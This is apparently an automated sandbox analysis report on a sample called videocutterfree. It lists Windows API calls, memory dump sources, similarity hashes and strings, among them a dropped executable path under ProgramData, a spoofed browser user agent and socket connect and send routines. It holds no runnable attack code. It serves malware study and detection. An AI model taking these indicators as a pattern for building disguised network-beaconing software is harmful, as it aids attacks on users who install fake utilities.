• GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
• GetTickCount.KERNEL32 ref: 00401FFB
• GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
Memory Dump Source
• Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
Similarity
• API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
• String ID:
• API String ID: 564119183-0
• Opcode ID: 8e9bcc6dc49fd93e7a343c7af07671cdd5b35766865ffdda6a5b1d9fb7f8855a
• Instruction ID: 3a1fb460451ce701fd6595fbba3645315e1b12efc03cc812e7124109c54b77f4
• Opcode Fuzzy Hash: 8e9bcc6dc49fd93e7a343c7af07671cdd5b35766865ffdda6a5b1d9fb7f8855a
• Instruction Fuzzy Hash: D0313B71A40251AFDB109FB99E489AF7B78EF45344F10807AFA46F7281D6748841D7A8

Control-flow Graph
APIs
• RtlEnterCriticalSection.NTDLL(?), ref: 00992706
• CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0099272B
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B4903), ref: 00992738
  • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
• SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00992778
• RtlLeaveCriticalSection.NTDLL(?), ref: 009927D9
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID: timer
• API String ID: 4293676635-1792073242
• Opcode ID: f5b32ebba3cfa53980384af27d3c4ecca1bf9ec0a40ba79c72c718e71abbda45
• Instruction ID: 89ac3a2fc324e175b70f78ec1c1e0d450fa6986f7ea7868635e6069e0fd6862a
• Opcode Fuzzy Hash: f5b32ebba3cfa53980384af27d3c4ecca1bf9ec0a40ba79c72c718e71abbda45
• Instruction Fuzzy Hash: 3431B0B1508706EFD710DF6AD944B6ABBE8FB88B24F004A2EF85593680D774E900CF91

Control-flow Graph
APIs
• Sleep.KERNEL32(0000EA60), ref: 00995F1C
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995F27
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995F38
• _free.LIBCMT ref: 009969D7
Strings
• Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00995F41
• urls, xrefs: 009969BF
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Similarity
• API ID: CriticalSection$EnterLeaveSleep_free
• String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
• API String ID: 2653569029-4235545730
• Opcode ID: cad521f5d3e1f76941c80b92891298ff26519f14259796ca214f001d67de1802
• Instruction ID: b205e0e0dbe252d8d509284d7aedfe7d4c6ea4741f744afead7ea137a981bb24
• Opcode Fuzzy Hash: cad521f5d3e1f76941c80b92891298ff26519f14259796ca214f001d67de1802
• Instruction Fuzzy Hash: F0118C33109750DFDF16AB6CAA167D97B60AF93331F14012DF9806B2C2DBA0694197D2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00991BAC
                                                                              • RtlEnterCriticalSection.NTDLL ref: 00991BBC
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 00991BEA
                                                                              • RtlEnterCriticalSection.NTDLL ref: 00991C13
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 00991C56
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                                              • String ID:
                                                                              • API String ID: 1633115879-0
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 00402F76
                                                                                • Part of subcall function 00403BE0: HeapCreate.KERNEL32(00000000,00001000,00000000,00402FAF,00000000), ref: 00403BF1
                                                                                • Part of subcall function 00403BE0: HeapDestroy.KERNEL32 ref: 00403C30
                                                                              • GetCommandLineA.KERNEL32 ref: 00402FC4
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00402FEF
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403012
                                                                                • Part of subcall function 0040306B: ExitProcess.KERNEL32 ref: 00403088
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                              • String ID:
                                                                              • API String ID: 2057626494-0
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992EEE
                                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00992EFD
                                                                              • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00992F0C
                                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00992F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Socketsetsockopt
                                                                              • String ID:
                                                                              • API String ID: 2093263913-0
                                                                              APIs
                                                                                • Part of subcall function 00992D39: WSASetLastError.WS2_32(00000000), ref: 00992D47
                                                                                • Part of subcall function 00992D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00992D5C
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992E6D
                                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 00992E83
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Sendselect
                                                                              • String ID: 3'
                                                                              • API String ID: 2958345159-280543908
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992AEA
                                                                              • connect.WS2_32(?,?,?), ref: 00992AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastconnect
                                                                              • String ID: 3'
                                                                              • API String ID: 374722065-280543908
                                                                              APIs
                                                                              Strings
                                                                              • C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, xrefs: 0040B4E6
                                                                              • alue, xrefs: 00402258
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe$alue
                                                                              • API String ID: 1889721586-2373946520
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: /chk$XiM#
                                                                              • API String ID: 481472006-2768313731
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 009936A7
                                                                                • Part of subcall function 00992420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00992432
                                                                                • Part of subcall function 00992420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00992445
                                                                                • Part of subcall function 00992420: RtlEnterCriticalSection.NTDLL(?), ref: 00992454
                                                                                • Part of subcall function 00992420: InterlockedExchange.KERNEL32(?,00000001), ref: 00992469
                                                                                • Part of subcall function 00992420: RtlLeaveCriticalSection.NTDLL(?), ref: 00992470
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1601054111-0
                                                                              APIs
                                                                              • __beginthreadex.LIBCMT ref: 009A0EB6
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000002,00999738,00000000), ref: 009A0EE7
                                                                              • ResumeThread.KERNEL32(?,?,?,?,?,00000002,00999738,00000000), ref: 009A0EF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleResumeThread__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 1685284544-0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(009C627C), ref: 00991ABA
                                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 00991ACB
                                                                              • InterlockedExchange.KERNEL32(009C6280,00000000), ref: 00991AD7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                                              • String ID:
                                                                              • API String ID: 1856147945-0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994BF2
                                                                                • Part of subcall function 00991BA7: __EH_prolog.LIBCMT ref: 00991BAC
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991BBC
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991BEA
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991C13
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991C56
                                                                                • Part of subcall function 0099CEA7: __EH_prolog.LIBCMT ref: 0099CEAC
                                                                                • Part of subcall function 0099CEA7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099CF2B
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00994CF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                              • String ID:
                                                                              • API String ID: 1927618982-0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID: 97?/
                                                                              • API String ID: 2962429428-2118945863
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992D47
                                                                              • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00992D5C
                                                                                • Part of subcall function 009992B8: WSAGetLastError.WS2_32(00000000,?,?,00992A51), ref: 009992C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Send
                                                                              • String ID:
                                                                              • API String ID: 1282938840-0
                                                                              APIs
                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00402FAF,00000000), ref: 00403BF1
                                                                                • Part of subcall function 00403A98: GetVersionExA.KERNEL32 ref: 00403AB7
                                                                              • HeapDestroy.KERNEL32 ref: 00403C30
                                                                                • Part of subcall function 00403FB7: HeapAlloc.KERNEL32(00000000,00000140,00403C19,000003F8), ref: 00403FC4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                                              • String ID:
                                                                              • API String ID: 2507506473-0
                                                                              • Opcode ID: aacb09cbeb48cc76d96456f08ad0e2855dac2d182e52656872482b59be82ca71
                                                                              • Instruction ID: 1f8d6d03a574f78a5dbc7526ae3fe5f16a5abed6931fcacc24763859c1a1efe3
                                                                              • Opcode Fuzzy Hash: aacb09cbeb48cc76d96456f08ad0e2855dac2d182e52656872482b59be82ca71
                                                                              • Instruction Fuzzy Hash: 28F065B2759341ADFB306F705E4572A3D9C9B50757F10483BF501F81D0EBBC8690961A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue
                                                                              • String ID:
                                                                              • API String ID: 3132538880-0
                                                                              • Opcode ID: 3b15842985ea571fc5274319ee977004e6d747577488aea3d6386d86f312ab07
                                                                              • Instruction ID: 286d2137decb703b2ba6424f4396009fe652a08dc4bb496cb5714d9023b4e1aa
                                                                              • Opcode Fuzzy Hash: 3b15842985ea571fc5274319ee977004e6d747577488aea3d6386d86f312ab07
                                                                              • Instruction Fuzzy Hash: B5D022308042039FC700ABA095040E83F71E72E31034A0030C413A2114DB360A52AA0C
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099511E
                                                                                • Part of subcall function 00993D7E: htons.WS2_32(?), ref: 00993DA2
                                                                                • Part of subcall function 00993D7E: htonl.WS2_32(00000000), ref: 00993DB9
                                                                                • Part of subcall function 00993D7E: htonl.WS2_32(00000000), ref: 00993DC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonl$H_prologhtons
                                                                              • String ID:
                                                                              • API String ID: 4039807196-0
                                                                              • Opcode ID: 304874ce778dd75448488c1fb928a8ea51088ef654986dabbd6ca5b03db0f2e5
                                                                              • Instruction ID: 4f9a00ef32c136df69f8706ac9d917b488877a50468375235021befddd65af82
                                                                              • Opcode Fuzzy Hash: 304874ce778dd75448488c1fb928a8ea51088ef654986dabbd6ca5b03db0f2e5
                                                                              • Instruction Fuzzy Hash: AF814AB5D0424ECFCF06DFA8D141AEEBBB8AF48314F14815AD851B7281EA356A05CFA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 955064b59b3196362df5baeefaf1269eece73dd153ee31c8e9397015138c69f0
                                                                              • Instruction ID: b58e057fc2d87ccc4ffded20c4ee50149728bd0cbd8e0ead6543b43dd24c9011
                                                                              • Opcode Fuzzy Hash: 955064b59b3196362df5baeefaf1269eece73dd153ee31c8e9397015138c69f0
                                                                              • Instruction Fuzzy Hash: A231ECB150C6409FE716AF19DC827AEFBE0EF55320F0A0A2DDAC587351D6366840CA87
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 588fcc24ff719009a777ce777dfbc749dab5c55250b1a2bd5e55cd3cc2406c2c
                                                                              • Instruction ID: 941b343fadd44c114953813c842786ee2fe4e4e7504130f5f41c4db4e564bcbe
                                                                              • Opcode Fuzzy Hash: 588fcc24ff719009a777ce777dfbc749dab5c55250b1a2bd5e55cd3cc2406c2c
                                                                              • Instruction Fuzzy Hash: E82137B250C604AFE7167F19DC85BBABBE4EF58320F06092CE6C543750E6356850CA97
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D775
                                                                                • Part of subcall function 00991A01: TlsGetValue.KERNEL32 ref: 00991A0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologValue
                                                                              • String ID:
                                                                              • API String ID: 3700342317-0
                                                                              • Opcode ID: 0740ccc323dc745eae800cbc8111922d652ac9b5d20612213b377e84b49d4de5
                                                                              • Instruction ID: f56bd4977948bf912854d709b11c220f071bbcb30c2ff5ac6fcaa6f2fc797f53
                                                                              • Opcode Fuzzy Hash: 0740ccc323dc745eae800cbc8111922d652ac9b5d20612213b377e84b49d4de5
                                                                              • Instruction Fuzzy Hash: FE214FB1905209AFDF00DFA8D581BEEBBF8FF49310F10442AE804E3241D775A901CBA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: a25ffb7b4f4858c4f0f51c4bb7c61693fb4f288fed42dc53c23d11ef154dd6fb
                                                                              • Instruction ID: cd56275ae1f2321ba839c17352d5888ebfe664e1bb408021d06e9d82bae90e86
                                                                              • Opcode Fuzzy Hash: a25ffb7b4f4858c4f0f51c4bb7c61693fb4f288fed42dc53c23d11ef154dd6fb
                                                                              • Instruction Fuzzy Hash: 64214AB250C600AFE3157F19D8867BAF7E4FF58721F06092CEBC593710DA3568508A97
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 26a53dd28cac0999f9ec941be806d66d1f7025ac5c313dfb6ae5a33366716217
                                                                              • Instruction ID: 1d2d9ae27bc955a732a976e2737d17179e4725ebf30f2348b5e93af04c69a172
                                                                              • Opcode Fuzzy Hash: 26a53dd28cac0999f9ec941be806d66d1f7025ac5c313dfb6ae5a33366716217
                                                                              • Instruction Fuzzy Hash: E311F9F151C7009FE3197F09EC856BABBE4EF88721F06892DE6C553640EA3564408A9B
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 0d7c23aa80e3d32b8f33dc09ede03e546d27027f4a93bf31c0c89e4ed17230cc
                                                                              • Instruction ID: 02f72abc7676810c6a39b6291507d17308d2cb93c0db382abf20fe1edd44ad53
                                                                              • Opcode Fuzzy Hash: 0d7c23aa80e3d32b8f33dc09ede03e546d27027f4a93bf31c0c89e4ed17230cc
                                                                              • Instruction Fuzzy Hash: 42015BF245C718AFE7197A08EC867B9B7E4EB14310F0A052DDBD043340FA3669148ADB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: a155f339f56ce1bd6cd0178ea6e66cea2f7cdb7da29d0c97348ed384cea35ef3
                                                                              • Instruction ID: f1fbad109dfddb230723c8a3674d8e82186fbec3b7e21f051d62ed124137c0a9
                                                                              • Opcode Fuzzy Hash: a155f339f56ce1bd6cd0178ea6e66cea2f7cdb7da29d0c97348ed384cea35ef3
                                                                              • Instruction Fuzzy Hash: 8B01B1B180D610EFD710BF18D8803B9BBE4EF44320F16083EEAE883240E63508448B97
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: fc18e2f6292c9321619dc4de1704e15e0f2fe16df16c278315069314b46f4c24
                                                                              • Instruction ID: e39af90385e2cbf6c1ad55de28f56484ac6ec9ea560f0c4cc6428a90195e3760
                                                                              • Opcode Fuzzy Hash: fc18e2f6292c9321619dc4de1704e15e0f2fe16df16c278315069314b46f4c24
                                                                              • Instruction Fuzzy Hash: 09F037B241C610DBD3117F19EC857BAFBE0FF48710F06492CEAC593610D63468409A87
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D305
                                                                                • Part of subcall function 009926DB: RtlEnterCriticalSection.NTDLL(?), ref: 00992706
                                                                                • Part of subcall function 009926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0099272B
                                                                                • Part of subcall function 009926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B4903), ref: 00992738
                                                                                • Part of subcall function 009926DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00992778
                                                                                • Part of subcall function 009926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009927D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID:
                                                                              • API String ID: 4293676635-0
                                                                              • Opcode ID: 7358112a0587489e1b523ec695325c0f0f13e4b7496bc6edbf897d88353b1996
                                                                              • Instruction ID: c724a9ba9c2e10b591c4445626536709fff92dc371a6a12d169f349aa72ff6f8
                                                                              • Opcode Fuzzy Hash: 7358112a0587489e1b523ec695325c0f0f13e4b7496bc6edbf897d88353b1996
                                                                              • Instruction Fuzzy Hash: 19019EB1915B04DFC728CF4AD640A95FBF4EF88310B15C5AEE4599B722E7B1AA40CF90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 15eed211e77d059ccdbc6a5d9df28cc36a1c51e6bec7c3fcfb08bb6ce98b1d37
                                                                              • Instruction ID: d248b396f610f18d4aa8d44381813f2aa2c3496366a82a12918c319db2dc6483
                                                                              • Opcode Fuzzy Hash: 15eed211e77d059ccdbc6a5d9df28cc36a1c51e6bec7c3fcfb08bb6ce98b1d37
                                                                              • Instruction Fuzzy Hash: 06F034B2818410EBD3116F05D882BAABBF0FBA8320F06882CEAD993610D2345C509A86
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D0E4
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 0099D300: __EH_prolog.LIBCMT ref: 0099D305
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_malloc
                                                                              • String ID:
                                                                              • API String ID: 4254904621-0
                                                                              • Opcode ID: 8c16685c28cc5d598cf6ded97810c8713d0e6786595ac5bb590ca4f40c027088
                                                                              • Instruction ID: 0d6809ecd6f2563c3664abd66d1f504b5a8bd9522b51059a42e9f43afeec1a6e
                                                                              • Opcode Fuzzy Hash: 8c16685c28cc5d598cf6ded97810c8713d0e6786595ac5bb590ca4f40c027088
                                                                              • Instruction Fuzzy Hash: 21E0C271A09209AFDF1CEF6CE91276E77A4EF84300F00417DB809D2340EF704A0096C0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
